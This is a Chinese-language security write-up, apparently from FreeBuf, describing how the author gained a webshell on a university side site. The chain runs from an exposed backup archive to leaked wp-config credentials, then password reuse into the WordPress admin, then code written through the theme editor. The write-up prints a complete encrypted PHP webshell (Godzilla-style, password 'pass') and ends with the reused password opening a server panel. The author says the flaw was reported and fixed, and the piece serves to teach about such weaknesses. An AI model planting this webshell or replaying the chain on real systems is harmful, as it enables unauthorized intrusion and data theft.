记一次某理工大学getshell(证书站)
2021-07-09 17:59:59 Author: www.freebuf.com(查看原文) 阅读量:100 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

刚放假,闲的没事,就想着一边用Xray+rad配合红队师傅写的py脚本来批量挖掘edu漏洞

py脚本地址: https://github.com/timwhitez/rad-xray
Xray地址:https://github.com/chaitin/xray
rad地址:https://github.com/chaitin/rad
使用详情请见  https://github.com/timwhitez/rad-xray

连续扫了几天也没啥收获,最后去看了一下漏洞报告,发现了某理工大学旁站的一个备份文件

访问 `https://xxxx/backup.zip` 下载备份文件

意外在`wp-config.php`中发现了数据库配置信息,其中包含了数据库账号和密码

并且发现了备份了数据库,用记事本打开,发现了用户名跟md5加密后的密码

虽然md5加密的密码无法解开,但是我们可以猜测他的数据库密码跟后台密码可能一致,于是用刚刚的数据库密码和这个后台管理员账号登录,成功进入后台

在外观 -> 主题编辑器 这里发现了可以写入代码的地方,尝试写入一句话,成功写入但蚁剑无法连接,于是尝试用哥斯拉的加密马写入。密码是 `pass`

<?php
  @session_start();
  @set_time_limit(0);
  @error_reporting(0);
  function encode($D,$K){
      for($i=0;$i<strlen($D);$i++) {
          $c = $K[$i+1&15];
          $D[$i] = $D[$i]^$c;
      }
      return $D;
  }
  $pass='pass';
  $payloadName='payload';
  $key='3c6e0b8a9c15224a';
  if (isset($_POST[$pass])){
      $data=encode(base64_decode($_POST[$pass]),$key);
      if (isset($_SESSION[$payloadName])){
          $payload=encode($_SESSION[$payloadName],$key);
          eval($payload);
          echo substr(md5($pass.$key),0,16);
          echo base64_encode(encode(@run($data),$key));
          echo substr(md5($pass.$key),16);
      }else{
          if (stripos($data,"getBasicsInfo")!==false){
              $_SESSION[$payloadName]=encode($data,$key);
          }
      }
  }

成功连接。到这儿就已经拿到webshell了

但是扫描了一下端口,另外还发现9999端口是服务器面板,访问 `https://xxxxx:9999/index.php?c=index&a=login` 猜测密码肯定还是原来的密码,但是用刚刚的账户名不能登录,将账户名改为`admin`密码还是刚刚的`数据库的密码`成功登录服务器管理面板


(ps:该站点已提交EduSRC,并已修复)


文章来源: https://www.freebuf.com/articles/web/280184.html
如有侵权请联系:admin#unsafe.sh